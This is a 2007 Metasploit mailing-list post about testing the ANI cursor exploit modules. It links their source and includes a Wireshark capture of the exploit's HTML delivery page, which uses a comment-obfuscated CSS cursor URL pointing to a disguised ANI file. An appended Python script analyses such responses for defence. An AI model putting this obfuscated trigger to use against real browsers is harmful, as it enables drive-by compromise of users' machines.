[framework] Metasploit vs ANI
Nicolas RUFF
nicolas.ruff at gmail.com
Mon Apr 2 03:58:53 CDT 2007
> Two new exploit modules are available for version 3.0 of the Metasploit
> Framework. These modules can be obtained by using the 'Online Update'
> feature in Windows and the 'svn update' command on Unix-like systems.
>
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
> http://blog.metasploit.com/
>
> The two exploits can be viewed in the svn repository at metasploit.com:
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb
Nice work!
I've just been testing the ANI/HTTP payload against XP SP2 and Vista, and the
Web page seems somewhat "corrupted". As a result, IE displays ASCII
characters without even crashing.
I cannot even see the "anih" header. The page might be GZIP'ed even if the
default options are set to turn off all evasion techniques. What do you
think?
Filtered Wireshark transcript below (non-printable characters removed).
---------------------------------------------------------------------------------
GET /lol HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 172.16.21.131:8080
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Content-Length: 2190
Connection: Keep-Alive
<html><head><title>iwIoCkcqMXo7NUF4jAab7WfntgguEDrbsQx15s1ofLRvJEKy1flkODQg8I974dg8U8kaDfJr0U6</title></head><body>XGbXGxssfFg0v45z0GrMpAdpKH5tv71MoP4orVvRg5L7JCv1wklX4EoDjouIQ9jvQg3zHit4bGryWUZy<div
style='...
/*
...
ZX6LrSqnsg3GSVC0SNA2zqW7m7U9s88ug4q4TUBh03dAo7QcMlzgbTVLb9U8ObHzq3Si4SFLOfGWppqEVA
...*/
CursOR
/*
oNVff76dUP3s62xTrUKNr5IcmLIMv8F32q62o20UuJTmI4kmNkc4BZEdP8BmUrRE6NQb1au5gaakFV5UOg8vfl7MGNqW6PvMGSSLUVeYKyFaAbH.
.*/
/*..
GWqQmaoquKHPIlTNHkHCaJPP5ecZOwgP2W0w0Pf4l77EyNBbfBimNEZkGSWU7bYWjSVaUOJbiJh
.*/.
URL(
. /*.
qT0bk8NjfYImQIICym7f5lvHidMBIZsGIlSTRmnsYzimxyQ8KlPXPpc1ykJE
*/
"/lol/aOqmmblrCLUVJrY0R1he7O3UdKPxCcb20QvZMSROQ9J5czCyXrQMFHNHP9crTdcLPaUBODji.wav?qZY=1"
./*
.lwgbsRjAQ34gH3SUz .
*/
.);
./*
rNpUJXbAD0XwmM3v
*/
'>IK0KlqBe5DnxRNVoCZtK94xSLyUfY3</div></body></html>
---------------------------------------------------------------------------------
Regards,
- Nicolas RUFF
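An added example, not part of the original post or of the Metasploit module: a small Python analyser for a captured response like the one in the transcript. It checks whether the server actually announced gzip (the capture carries no Content-Encoding header, so the body is plain HTML), strips the CSS comment noise interleaved in the style attribute, and recovers the cursor URL that points at the ANI resource. The sample response is constructed, modelled on the transcript with the random strings shortened.

```python
import gzip
import re

# Constructed sample modelled on the captured response: a text/html body
# with CSS comments interleaved inside the cursor declaration.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"<html><head><title>iwIoCkcq</title></head><body>XGbXGxss<div\n"
    b"style='/* ZX6LrSqn */ CursOR /* oNVff76d */ : /* GWqQmaoq */ URL( /* qT0bk8Nj */\n"
    b"\"/lol/aOqmmblrCLUVJrY0R1he7O3UdKPxCcb20QvZMSROQ9J5.wav?qZY=1\" /* lwgbsRjA */ );\n"
    b"'>IK0KlqBe</div></body></html>"
)

COMMENT_RE = re.compile(rb"/\*.*?\*/", re.DOTALL)
CURSOR_RE = re.compile(rb"cursor\s*:\s*url\(\s*['\"]?([^'\")\s]+)", re.IGNORECASE)


def split_response(raw):
    """Split a raw HTTP response into (lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body


def decode_body(headers, body):
    """Undo gzip only if the server actually announced it."""
    if headers.get("content-encoding", "").lower() == "gzip":
        return gzip.decompress(body)
    return body


def extract_cursor_urls(html):
    """Strip CSS comments, then return every cursor: url(...) target."""
    cleaned = COMMENT_RE.sub(b" ", html)
    return [m.decode() for m in CURSOR_RE.findall(cleaned)]


def analyse(raw):
    headers, body = split_response(raw)
    urls = extract_cursor_urls(decode_body(headers, body))
    # The capture served the cursor under a .wav name, so flag any cursor
    # resource whose path does not end in .cur/.ani for closer inspection.
    odd = [u for u in urls if not u.lower().split("?")[0].endswith((".cur", ".ani"))]
    return {"gzipped": "content-encoding" in headers, "cursor_urls": urls, "suspicious": odd}
```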